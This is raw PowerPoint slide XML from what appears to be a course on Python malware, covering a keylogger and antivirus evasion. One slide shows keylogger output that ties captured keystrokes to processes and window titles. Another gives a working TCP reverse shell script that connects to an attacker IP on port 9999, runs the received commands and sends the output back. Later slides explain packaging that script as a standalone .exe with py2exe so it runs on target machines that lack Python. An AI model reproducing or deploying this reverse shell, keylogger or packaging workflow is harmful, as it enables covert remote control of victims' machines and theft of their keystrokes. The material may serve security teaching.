      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62974E78-25E8-4DF2-A269-597AF631A0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117561" y="4748896"/>
            <a:ext cx="9821776"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 keylogger_database.py --show-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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1 - 192.168.10.192 - firefox.exe - 6200 - Mozilla Firefox - h e l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> o [Space] t h e r e , [Space]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2 - 192.168.10.192 - Explorer.EXE - 624 - share - [Back] [Back] s e c r e t . t x t </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3 - 192.168.10.192 - firefox.exe - 796 - Ghostly Kisses - Stay (Lyrics Video) - YouTube � Mozilla Firefox - [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lshift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] I [Space] l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4 - 192.168.10.192 - firefox.exe - 796 - Ghostly Kisses - Stay (Lyrics Video) - YouTube � Mozilla Firefox - k e [Space] t h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s [Space] s o n g </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5EBF214-47A3-4688-8815-8C370AB98EF3}"/>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33360658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Writing a Keylogger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135931" y="1874893"/>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delete the captured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>keylogs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>--delete-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>keylogs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> option</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151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C3E0F4-E0CD-4F81-8066-550417132A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684273" y="2469688"/>
            <a:ext cx="982177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python3 keylogger_database.py --delete-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylogs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51 rows have been removed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BB45BEA-B1C7-4C50-8F11-4A00B599ABE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964486" y="201664"/>
            <a:ext cx="5373397" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Python Malwares (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9954825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859504" y="214299"/>
            <a:ext cx="5065295" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>AV evasion with Python</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091815" y="1680208"/>
            <a:ext cx="10370118" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Py2exe is used to compile python files into a self-contained executables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In other words, py2exe can be used to compile python programs into standalone executables so that they don’t require Python interpreter to be present in the target computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This happens most of the time because Python isn’t usually installed in the targeted computers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will use py2exe to compile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before we start, we will create a simple PoC python script myscript.py that will contain “malicious” code which will execute a TCP reverse shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will use the following script throughout this section:</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152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C3E0F4-E0CD-4F81-8066-550417132A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828836" y="4265531"/>
            <a:ext cx="9821776"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socket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subprocess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r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>so = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.socket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s.AF_INET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s.SOCK_STREAM</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so.connect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'192.168.10.95'</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9999</a:t>
            </a:r>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d = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>so.recv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1024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(d) ==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break</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p = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r.Popen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d.decode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shell</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stdin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r.PIPE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stdout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r.PIPE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stderr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r.PIPE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o = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p.stdout.read</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p.stderr.read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so.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(o)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31697550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091815" y="1680208"/>
            <a:ext cx="10370118"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If we run this code using Python interpreter on a Windows machine:</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153</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C3E0F4-E0CD-4F81-8066-550417132A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1560131" y="2141873"/>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python myscript.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A6E655-0B49-4E9D-9004-B91253CC463A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091815" y="2644760"/>
            <a:ext cx="3977490" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We get a reverse shell back on the attacker box:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EFEA970-0BFA-4E8F-9F41-71927E090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331" y="2621603"/>
            <a:ext cx="6603332" cy="4099871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17533369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11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BDD84EF-BE49-495D-A14D-B29F156D3C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091815" y="1680208"/>
            <a:ext cx="10370118"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a:t>Now, we can start talking about py2exe 😃</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First, we can install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>py2exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> through either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>pip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or downloading it from its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>GitHub repo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a: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154</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C3E0F4-E0CD-4F81-8066-550417132A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1588172" y="3178424"/>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pip install py2exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A6E655-0B49-4E9D-9004-B91253CC463A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091815" y="2644760"/>
            <a:ext cx="3977490"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install it through pip:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26664670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155</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1" y="1870923"/>
            <a:ext cx="9656396" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once installed, we’ll need to create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>setup.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file, which will contain the information about which file we want to compile into an executable file.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0B5C3CB-EDA9-49BE-994D-622C9EB3AE54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483898" y="2618671"/>
            <a:ext cx="982177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setuptools</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setup</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py2exe</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setup(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console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'myscript.py'</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options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'py2exe'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bundle_files</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'compressed'</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zipfile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B1EEFE1E-9CD9-401B-A00F-BC486F880CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483897" y="4204583"/>
            <a:ext cx="9950113" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: file names to convert into “console” exe(s).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: contains dictionary that specifies options.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>bundle_files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Extension modules, the Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and other needed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dlls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are put into the exe, which are then loaded directly without unpacking into the file system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>compressed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: files will be compressed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>zipfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the name of shared zip file (contains needed dependencies) to generate is None, which means no zip file will be generated.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23602604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156</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1" y="1870923"/>
            <a:ext cx="9656396" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When we run this, our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>myscript.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> needs to be in the same folder as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>setup.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and we also need to provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>py2exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> argument.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0B5C3CB-EDA9-49BE-994D-622C9EB3AE54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483898" y="2618671"/>
            <a:ext cx="9821776"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C:\Users\user\Desktop\test\py2exe&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python .\setup.py py2exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>running py2exe</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Building '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\myscript.exe'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="14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181AFE44-E444-4C41-BA30-4E10C2101631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987541" y="4080354"/>
            <a:ext cx="10217870"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finished, py2exe will generate our output executable file at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>\myscript.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>along with other files:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
